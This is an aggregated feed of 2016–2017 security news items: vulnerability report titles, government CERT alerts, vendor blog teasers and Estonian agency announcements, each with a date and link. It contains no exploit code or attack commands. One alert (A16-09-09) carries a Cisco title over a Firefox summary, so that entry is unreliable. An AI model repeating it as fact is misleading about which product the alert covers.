Riigi Infosüsteemi Amet palub kasutajatel uuendada ID-tarkvara. 22. veebruaril kaob uuendamata tarkvarast võimalus anda ja kontrollida digitaalallkirju.

https://ria.ee/uudised/palume-uuendada-id-tarkvara
Breaking Down Binary Ninja’s Low Level IL
2017-01-31T11:50:09Z | 1485863409

Hi, I’m Josh. I recently joined the team at Trail of Bits, and I’ve been an evangelist and plugin writer for the Binary Ninja reversing platform for a while now. I’ve developed plugins that make reversing easier and extended Binary Ninja’s architecture support to assist in playing the microcorruption CTF. One of my favorite features of […]

https://blog.trailofbits.com/2017/01/31/breaking-down-binary-ninjas-low-level-il/
Riik soovitab koodikaartidest loobuda
2017-01-26T22:00:00Z | 1485468000

Riigi Infosüsteemi Ameti peadirektori Taimar Peterkopi hinnangul on avaliku sektori teenusepakkujatel aeg hakata loobuma paroolikaardi aktsepteerimisest autentimisvahendina.

https://ria.ee/uudised/riik-soovitab-koodikaartidest-loobuda
Security Alert (A17-01-06): Multiple Vulnerabilities in Apple iOS
2017-01-26T04:00:00Z | 1485403200

Apple has released software update fixing 18 vulnerabilities in iOS versions prior to iOS 10.2.1. These vulnerabilities are caused by the problems in various iOS components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-01-05): Multiple Vulnerabilities in Firefox
2017-01-25T04:00:00Z | 1485316800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory corruption, use-after-free error and memory safety bugs, etc.

https://www.govcert.gov.hk/en/alerts_detail.php
The “Innovation”​ in RSAC Innovation Sandbox
2017-01-23T09:44:03Z | 1485164643

We are honored to be named finalist at the 2017 RSA Innovation Sandbox (ISB) contest. 87 companies applied and 10 were selected. Last year RSA conference was marked by an “explosion” of security vendors (over 550), and this year will likely see an even larger crowd. Cybersecurity is one area in IT that is always... The post The “Innovation”​ in RSAC Innovation Sandbox appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-innovation-in-rsac-innovation-sandbox/
Libbpg BGP image decoding Code Execution Vulnerability
2017-01-23T00:00:00Z | 1485129600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0223
SD-WAN and Beyond: What to Consider in a WAN Transformation?
2017-01-22T11:27:26Z | 1485084446

Companies should not be shortsighted when upgrading their WANs. It’s not “just” about cutting the cost of  their existing MPLS-based WANs. It’s also about looking forward and addressing the bigger challenges facing business around the cloud, mobility and more. We’ll look at those challenges this week when long-time industry veteran and expert, Dr. Jim Metzler,... The post SD-WAN and Beyond: What to Consider in a WAN Transformation? appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-and-beyond-what-to-consider-in-a-wan-transformation/
Adobe Acrobat Reader DC jpeg decoder Remote Code Execution Vulnerability
2017-01-20T00:00:00Z | 1484870400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0259
Cato Named Finalist to the 2017 RSA Innovation Sandbox Contest
2017-01-18T15:39:15Z | 1484753955

We’re gearing up for the RSA Conference in San Francisco next month, but not just to attend the show. Cato has been named as one of 10 finalists for the prestigious Innovation Sandbox Contest that’s run annually at the San Francisco, RSA Conference. Innovation Sandbox recognizes innovative companies with ground-breaking technologies and at Cato, we... The post Cato Named Finalist to the 2017 RSA Innovation Sandbox Contest appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-named-finalist-2017-rsa-innovation-sandbox-contest/
Security Alert (A17-01-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2017)
2017-01-18T04:00:00Z | 1484712000

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Oracle Outside In Technology RTF Parsing Code Execution Vulnerability
2017-01-17T00:00:00Z | 1484611200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0215
Oracle Outside In Technology PDF parser confusion Code Execution Vulnerability
2017-01-17T00:00:00Z | 1484611200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0198
Security Alert (A17-01-03): Multiple Vulnerabilities in ISC BIND
2017-01-12T04:00:00Z | 1484193600

Multiple vulnerabilities were found in the ISC BIND software. Both authoritative and recursive name servers are affected.

https://www.govcert.gov.hk/en/alerts_detail.php
17 Essential Skills for Performance Engineers
2017-01-11T05:00:00Z | 1484110800

Most people in the performance engineering field agree that our skillset is derived from an intersection of disciplines that include testing, optimization, and systems engineering.

https://www.akamai.com/blog/developers/17-essential-skills-for-performance-engineers
Security Alert (A17-01-01): Multiple Vulnerabilities in Microsoft Products (January 2017)
2017-01-11T04:00:00Z | 1484107200

Microsoft has released 4 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-01-02): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2017-01-11T04:00:00Z | 1484107200

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities caused by heap buffer overflow, use-after-free error, security bypass, memory corruption, and type confusion.

https://www.govcert.gov.hk/en/alerts_detail.php
2016 Year in Review
2017-01-09T13:28:15Z | 1483968495

John Oliver may have written off 2016, but we’re darn proud of all that we accomplished and contributed this year. We released a slew of the security tools that help us -and you- work smarter, and promoted a few more that deserved recognition. We helped the New York City InfoSec community build a foundation for […]

https://blog.trailofbits.com/2017/01/09/2016-year-in-review/
Aerospike Database Server Index Name Code Execution Vulnerability
2017-01-09T00:00:00Z | 1483920000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0266
Aerospike Database Server Set Name Code Execution Vulnerability
2017-01-09T00:00:00Z | 1483920000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0268
Aerospike Database Server Client Message Memory Disclosure Vulnerability
2017-01-09T00:00:00Z | 1483920000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0264
Kauguuendatavate ID-kaartide hulk kasvab
2016-12-29T22:00:00Z | 1483048800

Riigi Infosüsteemi Amet suurendab alates jaanuari esimesest nädalast kauguuendatavate ID-kaartide hulka 650 000 võrra.

https://ria.ee/uudised/kauguuendatavate-id-kaartide-hulk-kasvab
Blender Case Study: FinTech Drops the Box
2016-12-28T18:05:54Z | 1482948354

With plans to add more remote branches in the New Year, Blender decided it was time to shed management and maintenance of firewall appliances and move to centralized network provisioning and security.   Background Eliminating borders for both lenders and borrowers worldwide is at the heart of Blender’s peer-to-peer lending platform. Founded three years... The post Blender Case Study: FinTech Drops the Box appeared first on Cato Networks.

https://www.catonetworks.com/blog/blender-case-study-fintech-drops-the-box/
2017: All Engines Go!
2016-12-28T14:55:17Z | 1482936917

Changing the (IT) world is a big task, but we are off to a great start. Cato Networks has captured the imagination of numerous IT professionals with an all-new approach to an age old problem: the ever-growing cost and complexity of networking and security point products. In February, we emerged out of stealth and introduced... The post 2017: All Engines Go! appeared first on Cato Networks.

https://www.catonetworks.com/blog/2017-all-engines-go/
Security Alert (A16-12-07): Vulnerability in PHPMailer
2016-12-28T04:00:00Z | 1482897600

A vulnerability is found in the PHPMailer plugin that could lead to remote arbitrary code execution.

https://www.govcert.gov.hk/en/alerts_detail.php
Let’s talk about CFI: Microsoft Edition
2016-12-27T11:00:29Z | 1482836429

We’re back with our promised second installment discussing control flow integrity. This time, we will talk about Microsoft’s implementation of control flow integrity. As a reminder, control flow integrity, or CFI, is an exploit mitigation technique that prevents bugs from turning into exploits. For a more detailed explanation, please read the first post in this […]

https://blog.trailofbits.com/2016/12/27/lets-talk-about-cfi-microsoft-edition/
2016 Greatest Hits: Cato Networks Year in Review
2016-12-26T11:43:02Z | 1482752582

What a year it has been… We had a great launch in February, completed our $50M funding in June, and acquired some amazing customers along the way. During the year we’ve published some useful, in-depth content. Here are the most viewed assets of 2016… Global Network Security Report Top Networking and Security Challenges in the... The post 2016 Greatest Hits: Cato Networks Year in Review appeared first on Cato Networks.

https://www.catonetworks.com/blog/2016-greatest-hits-cato-networks-year-in-review/
Switching Security Vendors? Drop the Box!
2016-12-20T15:05:48Z | 1482246348

While your organization works to keep ahead of the latest network security threats, you regularly encounter capacity constraints and product limitations from managing your existing firewall before eventually needing to refresh or replace it. It’s time to reevaluate your current firewall vendor: Does their roadmap inspire confidence or leave doubt for your network security posture... The post Switching Security Vendors? Drop the Box! appeared first on Cato Networks.

https://www.catonetworks.com/blog/drop-the-box/
Tarantool Key-type Denial Of Service Vulnerability
2016-12-16T00:00:00Z | 1481846400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0255
Joyent SmartOS Hyprlofs FS IOCTL Add Entries Native File System Denial of Service Vulnerability
2016-12-16T00:00:00Z | 1481846400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0257
Tarantool Msgpuck mp_check Denial Of Service Vulnerability
2016-12-16T00:00:00Z | 1481846400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0254
Security Alert (A16-12-05): Multiple Vulnerabilities in IBM Notes
2016-12-15T04:00:00Z | 1481774400

Multiple vulnerabilities are found in IBM Lotus Notes related to Apache Struts and Taglibs.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-12-06): Multiple Vulnerabilities in Apple iOS
2016-12-15T04:00:00Z | 1481774400

Apple has released software update fixing 12 vulnerabilities in iOS versions prior to iOS 10.2.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-12-02): Multiple Vulnerabilities in Microsoft Products (December 2016)
2016-12-14T04:00:00Z | 1481688000

Microsoft has released 12 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-12-03): Multiple Vulnerabilities in Adobe Flash Player
2016-12-14T04:00:00Z | 1481688000

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by buffer overflow, memory corruption, security restriction bypass and use-after-free errors. Reports indicate that one of the vulnerabilities is being actively exploited in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-12-04): Multiple Vulnerabilities in Firefox
2016-12-14T04:00:00Z | 1481688000

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory corruption, buffer overflow, use-after-free error, memory safety bugs and security restriction bypass, etc.

https://www.govcert.gov.hk/en/alerts_detail.php
Nvidia Windows Kernel Mode Driver Denial Of Service
2016-12-14T00:00:00Z | 1481673600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0217
Tallinnas tähistatakse X-tee 15. sünnipäeva
2016-12-13T22:00:00Z | 1481666400

Riigi Infosüsteemi Amet tähistab Tallinnas toimuva konverentsiga andmevahetuskihi X-tee 15. sünnipäeva.

https://ria.ee/uudised/tallinnas-tahistatakse-x-tee-15-sunnipaeva
Meet Algo, the VPN that works
2016-12-12T12:50:41Z | 1481547041

I think you’ll agree when I say: there’s no VPN option on the market designed with equal emphasis on security and ease of use. That changes now. Today we’re introducing Algo, a self-hosted personal VPN server designed for ease of deployment and security. Algo automatically deploys an on-demand VPN service in the cloud that is not […]

https://blog.trailofbits.com/2016/12/12/meet-algo-the-vpn-that-works/
Joyent SmartOS Hyprlofs FS IOCTL Native File System Integer Overflow Privilege Escalation Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0248
Joyent SmartOS Hyprlofs FS IOCTL 32-bit File System Integer Overflow Privilege Escalation Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0249
Joyent SmartOS Hyprlofs FS IOCTL Native File System name Buffer Overflow Privilege Escalation Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0250
Joyent SmartOS Hyprlofs FS IOCTL Native File System path Buffer Overflow Privilege Escalation Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0251
Joyent SmartOS Hyprlofs FS IOCTL 32-bit File System name Buffer Overflow Privilege Escalation Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0252
Joyent SmartOS Hyprlofs FS IOCTL 32-bit File System path Buffer Overflow Privilege Escalation Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0253
Joyent SmartOS Hyprlofs FS IOCTL Add Entries 32-bit File System Denial of Service Vulnerability
2016-12-12T00:00:00Z | 1481500800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0258
Firewall as a Service: Uniting your Network and Security Again
2016-12-07T16:17:39Z | 1481127459

It really wasn’t very long ago when installing a Firewall (FW) or Unified Threat Management (UTM) system at the perimeter was deemed secure enough to protect corporate networks. But those very networks have changed dramatically over the past decade. As organizations became more global so did their users, data and infrastructure needs right along with... The post Firewall as a Service: Uniting your Network and Security Again appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-as-a-service-uniting-your-network-and-security-again/
Taking Your WAN into the Next Generation: Understanding Your Options
2016-12-05T08:04:43Z | 1480925083

The days when physical locations represented the heart of your network are firmly in the rear-view mirror. More and more, global cloud-based services and mobility are increasingly demanding a greater share of your network’s traffic, raising the need for a Wide Area Network (WAN) that connects all of your network services and users regardless of... The post Taking Your WAN into the Next Generation: Understanding Your Options appeared first on Cato Networks.

https://www.catonetworks.com/blog/taking-your-wan-into-the-next-generation-understanding-your-options/
ImageMagick Convert Tiff Adobe Deflate Code Execution Vulnerability
2016-12-03T00:00:00Z | 1480723200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0216
Security Alert (A16-12-01): Vulnerability in Firefox
2016-12-01T04:00:00Z | 1480564800

Mozilla has published a security advisory to address a vulnerability found in Firefox. This vulnerability is caused by use-after-free error. Reports indicate that the vulnerability is being actively exploited in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-11-06): Vulnerability in Firefox
2016-11-29T04:00:00Z | 1480392000

Mozilla has published a security advisory to address a vulnerability found in Firefox. This vulnerability is caused by redirection from a HTTP connection to a data: URL.

https://www.govcert.gov.hk/en/alerts_detail.php
Convenient Mobile Commerce is the Key to Success this Holiday Season
2016-11-23T05:00:00Z | 1479877200

With the Black Friday, Cyber Monday holiday weekend upon us, retailers in the U.S. and abroad are preparing for another peak period for customer acquisition and commerce revenues. In 2016, the U.S. eCommerce market is the second largest globally and...

https://www.akamai.com/blog/news/convenient-mobile-commerce-is-the-key-to-success-this-holiday-season
FIRST and LACNIC sign agreement to improve incident response capability in Latin America and the Caribbean
2016-11-22T14:00:00Z | 1479823200

Memorandum of Understanding enables both organizations to benefit from each other’s programs to support computer security incident response teams (CSIRT) in the region.

https://www.first.org/newsroom/releases/20161122
Network Time Protocol Trap Crash Denial of Service Vulnerability
2016-11-21T00:00:00Z | 1479686400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0204
Network Time Protocol Broadcast Mode Replay Prevention Denial of Service Vulnerability
2016-11-21T00:00:00Z | 1479686400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0131
Network Time Protocol Control Mode Unauthenticated Trap Information Disclosure and DDoS Amplification Vulnerability
2016-11-21T00:00:00Z | 1479686400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0203
Network Time Protocol Broadcast Mode Poll Interval Enforcement Denial of Service Vulnerability
2016-11-21T00:00:00Z | 1479686400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0130
Survey Report: 700 Networking, Security & IT Pros Share Top Challenges and What’s Driving Investments in 2017
2016-11-17T08:38:14Z | 1479371894

41 percent see FWaaS as the most promising infrastructure protection technology; 50 percent plan to eliminate hardware in 2017   In the latest survey report from the Cato research team, 700 networking, security and IT executives share their biggest risks, challenges, and planned investments related to network connectivity and security. Top risks and challenges reported... The post Survey Report: 700 Networking, Security & IT Pros Share Top Challenges and What’s Driving Investments in 2017 appeared first on Cato Networks.

https://www.catonetworks.com/blog/survey-report-700-networking-security-it-pros-share-top-challenges-and-whats-driving-investments-in-2017/
HDF5 Group libhdf5 H5T_COMPOUND Code Execution Vulnerability
2016-11-17T00:00:00Z | 1479340800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0179
HDF5 Group libhdf5 H5T_ARRAY Code Execution Vulnerability
2016-11-17T00:00:00Z | 1479340800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0176
HDF5 Group libhdf5 H5Z_NBIT Code Execution Vulnerability
2016-11-17T00:00:00Z | 1479340800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0177
HDF5 Group libhdf5 Shareable Message Type Code Execution Vulnerability
2016-11-17T00:00:00Z | 1479340800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0178
MKM: Eesti ja Soome asuvad koos X-teed arendama
2016-11-16T22:00:00Z | 1479333600

Majandus- ja Kommunikatsiooniministeerium (MKM) sai valitsuselt õiguse Eesti ja Soome X-tee ühiseks arendamiseks loodava mittetulundusühingu asutamiseks. Asutatava MTÜ nimeks saab Nordic Institute for Interoperability Solutions, ehk Põhjamaade Koosvõimelahenduste Instituut.

https://ria.ee/uudised/mkm-eesti-ja-soome-asuvad-koos-x-teed-arendama
Security Alert (A16-11-05): Multiple Vulnerabilities in Firefox
2016-11-16T04:00:00Z | 1479268800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-11-03): Multiple Vulnerabilities in Microsoft Products (November 2016)
2016-11-09T04:00:00Z | 1478664000

Microsoft has released 14 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that the vulnerabilities mentioned in MS16-132 and MS16-135 are being exploited in wild. In addition, there are scattered exploits observed against the vulnerabilities mentioned in MS16-129 and MS16-142.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-11-04): Multiple Vulnerabilities in Adobe Flash Player
2016-11-09T04:00:00Z | 1478664000

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by type confusion and use-after-free errors.

https://www.govcert.gov.hk/en/alerts_detail.php
[Webinar] Stop Appliance Sprawl & Traffic Backhauling
2016-11-06T11:32:28Z | 1478431948

We are excited to announce our November webinar, “Stop Appliance Sprawl & Traffic Backhauling”, live on November 8th and November 10th. Register using the link below. Securing Internet access in the branch office is a tough trade-off between deploying security appliances everywhere or backhauling internet traffic to a secure location. Appliances at every remote location... The post [Webinar] Stop Appliance Sprawl & Traffic Backhauling appeared first on Cato Networks.

https://www.catonetworks.com/blog/webinar-stop-appliance-sprawl-traffic-backhauling/
Reduce Branch Office IT Footprint, Overcome Persistent Network and Security Challenges
2016-11-03T12:33:52Z | 1478176432

Have you heard of FWaaS? If not, pay attention. It could change your entire approach to network security, and help save your sanity.   Gone are the days when it was simple and effective to connect remote sites with a perimeter firewall, or backhaul traffic to a datacenter to keep companies secure and functional. The... The post Reduce Branch Office IT Footprint, Overcome Persistent Network and Security Challenges appeared first on Cato Networks.

https://www.catonetworks.com/blog/reduce-branch-office-it-footprint-overcome-persistent-network-and-security-challenges/
Yes, My Name is ||
2016-11-03T07:00:00Z | 1478156400

Different cultures and nationalities have different naming conventions; I came from a one that led me to face the universe with a personal name "Or". I fact, my name has different meanings in different languages. In English the meaning of "Or" is function word that indicate alternatives and in computer coding languages the name "Or" is being used as Boolean operator that enable us to write conditions in our code.

https://www.akamai.com/blog/security/yes--my-name-is---
GMER Path Length Code Execution Vulnerability
2016-11-03T00:00:00Z | 1478131200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0127
Planning for the End of 2016: A Leap Second and the End-of-Support for SHA-1 TLS Certificates
2016-11-02T13:00:00Z | 1478091600

A leap second and the final end of browser support for SHA-1 TLS certificates will happen and can potentially break software systems and applications.

https://www.akamai.com/blog/security/the-end-of-support-for-sha-tls-certificates
Shin GRR: Make Fuzzing Fast Again
2016-11-02T11:50:40Z | 1478087440

We’ve mentioned GRR before – it’s our high-speed, full-system emulator used to fuzz program binaries. We developed GRR for DARPA’s Cyber Grand Challenge (CGC), and now we’re releasing it as an open-source project! Go check it out. Fear GRR Bugs aren’t afraid of slow fuzzers, and that’s why GRR was designed with unique and innovative […]

https://blog.trailofbits.com/2016/11/02/shin-grr-make-fuzzing-fast-again/
Security Alert (A16-11-01): Vulnerability in ISC BIND
2016-11-02T04:00:00Z | 1478059200

A vulnerability was found in the ISC BIND software. Both authoritative and recursive name servers are affected.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-11-02): Vulnerability in Microsoft Windows
2016-11-02T04:00:00Z | 1478059200

A vulnerability was identified in Microsoft Windows Kernel. A local user can obtain elevated privileges on the target system when invoking a specially crafted system call.

https://www.govcert.gov.hk/en/alerts_detail.php
Memcached Server Append/Prepend Remote Code Execution Vulnerability
2016-10-31T00:00:00Z | 1477872000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0219
Memcached Server Update Remote Code Execution Vulnerability
2016-10-31T00:00:00Z | 1477872000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0220
Memcached Server SASL Autentication Remote Code Execution Vulnerability
2016-10-31T00:00:00Z | 1477872000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0221
Security Alert (A16-10-10): Vulnerability in Adobe Flash Player
2016-10-27T04:00:00Z | 1477540800

Security update is released for Adobe Flash Player to address a vulnerability caused by use-after-free error.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-11): Multiple Vulnerabilities in Apple iOS
2016-10-27T04:00:00Z | 1477540800

Apple has released software update fixing 14 vulnerabilities in iOS versions prior to iOS 10.1.

https://www.govcert.gov.hk/en/alerts_detail.php
Lekkisid riigiametnike tööalased e-posti aadressid
2016-10-26T21:00:00Z | 1477515600

Riigi Infosüsteemi Ameti küberturvalisuse teenistuse septembrikuu ülevaate kohaselt lekkisid Dropboxi kaudu Eesti kõrgete riigiametnike tööalased e-posti aadressid ja pilveteenuses kasutatud paroolide räsid.

https://ria.ee/uudised/lekkisid-riigiametnike-tooalased-e-posti-aadressid
Come Find Us at O’Reilly Security
2016-10-26T11:50:09Z | 1477482609

We’re putting our money where our mouth is again. In continued support for New York’s growing infosec community we’re excited to sponsor the upcoming O’Reilly Security Conference. We expect to be an outlier there: we’re the only sponsor that offers consulting and custom engineering rather than just off-the-shelf products. We see this conference as an […]

https://blog.trailofbits.com/2016/10/26/come-find-us-at-oreilly-security/
Firewall Elimination: Universal Mental Health Services Case Study
2016-10-26T06:26:30Z | 1477463190

With 13 locations and 900 employees, Universal Mental Health Services made the inevitable decision to eliminate their branch firewalls with Cato Networks. Background Universal Mental Health Services (UMHS) is dedicated to helping individuals and families affected by mental illness, developmental disabilities and substance abuse in achieving their full potential to live, work and grow in the... The post Firewall Elimination: Universal Mental Health Services Case Study appeared first on Cato Networks.

https://www.catonetworks.com/blog/universal-mental-health-services-case-study/
Iceni Argus ipNameAdd Code Execution Vulnerability
2016-10-26T00:00:00Z | 1477440000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0202
Iceni Argus ipfSetColourStroke Code Execution Vulnerability
2016-10-26T00:00:00Z | 1477440000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0200
LibTIFF TIFF2PDF TIFFTAG_JPEGTABLES Remote Code Execution Vulnerability
2016-10-25T00:00:00Z | 1477353600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0187
LibTIFF Tag Extension Remote Code Execution Vulnerability
2016-10-25T00:00:00Z | 1477353600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0190
LibTIFF PixarLogDecode Remote Code Execution Vulnerability
2016-10-25T00:00:00Z | 1477353600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0205
Security Alert (A16-10-07): Vulnerability in ISC BIND
2016-10-24T04:00:00Z | 1477281600

A vulnerability was found in the ISC BIND software released before May 2013 and in third-party versions that do not include fix number 3548.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-08): Vulnerability in Linux Kernel
2016-10-24T04:00:00Z | 1477281600

A local privilege escalation vulnerability is found in the Linux kernel 2.6.22 or later.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-09): Multiple Vulnerabilities in Firefox
2016-10-24T04:00:00Z | 1477281600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-05): Multiple Vulnerabilities in Cisco Products
2016-10-20T04:00:00Z | 1476936000

Cisco has released three security advisories fixing a number of vulnerabilities in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower System Software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-06): Vulnerability in Apache Struts
2016-10-20T04:00:00Z | 1476936000

A vulnerability is found in the Convention plugin of Apache Struts that could allow path traversal and arbitrary code execution.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2016)
2016-10-19T04:00:00Z | 1476849600

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit PDF Reader JBIG2 Parser Information Disclosure Vulnerability
2016-10-18T00:00:00Z | 1476748800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0201
Hopper Disassembler ELF Section Header Size Code Execution Vulnerability
2016-10-18T00:00:00Z | 1476748800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0222
Let’s talk about CFI: clang edition
2016-10-17T11:50:15Z | 1476705015

Our previous blog posts often mentioned control flow integrity, or CFI, but we have never explained what CFI is, how to use it, or why you should care. It’s time to remedy the situation! In this blog post, we’ll explain, at a high level, what CFI is, what it does, what it doesn’t do, and […]

https://blog.trailofbits.com/2016/10/17/lets-talk-about-cfi-clang-edition/
Consistent vs. Best Effort: Building a Predictable Enterprise Network
2016-10-13T11:32:37Z | 1476358357

For decades, one of the primary distinctions between MPLS and internet-based connectivity was guaranteed latency. Why is this guarantee so important and why do you need carrier provided MPLS-service to get it? Latency is the time it takes for a packet to travel between two locations. The absolute minimum is the time it would take... The post Consistent vs. Best Effort: Building a Predictable Enterprise Network appeared first on Cato Networks.

https://www.catonetworks.com/blog/consistent-vs-best-effort-building-a-predictable-enterprise-network/
Security Alert (A16-10-02): Multiple Vulnerabilities in Microsoft Products (October 2016)
2016-10-12T04:00:00Z | 1476244800

Microsoft has released 10 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that some of the vulnerabilities are being actively exploited in wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-03): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2016-10-12T04:00:00Z | 1476244800

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities caused by heap buffer overflow, integer overflow, use-after-free error, security bypass, memory corruption, and type confusion.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-10-01): Multiple Vulnerabilities in Cisco Products
2016-10-06T04:00:00Z | 1475726400

Cisco has released 5 security advisories fixing a number of vulnerabilities in Cisco NX-OS Software.

https://www.govcert.gov.hk/en/alerts_detail.php
Automated Code Audit’s First Customer
2016-10-04T11:50:46Z | 1475581846

Last month our Cyber Reasoning System (CRS) -developed for DARPA’s Cyber Grand Challenge– audited a much larger amount of code in less time, in greater detail, and at a lower cost than a human could. Our CRS audited zlib for the Mozilla Secure Open Source (SOS) Fund. To our knowledge, this is the first instance […]

https://blog.trailofbits.com/2016/10/04/first-ever-automated-code-audit/
Avalikustati X-tee keskuse tarkvara lähtekood
2016-10-03T21:00:00Z | 1475528400

Eesti ja Soome vahel 2014. aastal sõlmitud X-tee koosarendamise leppe loogilise jätkuna avalikustati X-tee keskuse tarkvara lähtekood, litsentsi tüüp on MIT.

https://ria.ee/uudised/avalikustati-x-tee-keskuse-tarkvara-lahtekood
FreeImage Library XMP Image Handling Code Execution Vulnerability
2016-10-03T00:00:00Z | 1475452800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0189
Security Alert (A16-09-09): Multiple Vulnerabilities in Cisco Products (September 2016)
2016-09-30T04:00:00Z | 1475208000

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Redis CONFIG SET client-output-buffer-limit command Code Execution Vulnerability
2016-09-30T00:00:00Z | 1475193600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0206
CERT-EE annab teada uuest petuskeemist
2016-09-29T21:00:00Z | 1475182800

E-kirjadega on võetud sihikule inimesed, kes müüvad internetis mõnd suhteliselt kallist eset.

https://ria.ee/uudised/cert-ee-annab-teada-uuest-petuskeemist
OpenJPEG JPEG2000 mcc record Code Execution Vulnerability
2016-09-29T00:00:00Z | 1475107200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0193
Anatomy of a Blackhat SEO spam campaign (with a twist)
2016-09-28T08:12:52Z | 1475050372

Legitimate websites are hacked and recruited into a spam network During a periodic analysis of Cato Cloud traffic in the Cato Research Lab, we noticed that our security analytics engine was triggered by a request to a code sharing service, Pastebin. The request was originated from a preschool website in Singapore (Figure 1). Pastebin is... The post Anatomy of a Blackhat SEO spam campaign (with a twist) appeared first on Cato Networks.

https://www.catonetworks.com/blog/anatomy-of-a-blackhat-seo-spam-campaign-with-a-twist/
Security Alert (A16-09-08): Vulnerability in ISC BIND
2016-09-28T04:00:00Z | 1475035200

A vulnerability was found in the ISC BIND software. All name servers are vulnerable if they can receive request packets from any source.

https://www.govcert.gov.hk/en/alerts_detail.php
Windows network security now easier with osquery
2016-09-27T11:50:01Z | 1474977001

Today, Facebook announced the successful completion of our work: osquery for Windows. “Today, we’re excited to announce the availability of an osquery developer kit for Windows so security teams can build customized solutions for their Windows networks… This port of osquery to Windows gives you the ability to unify endpoint defense and participate in an […]

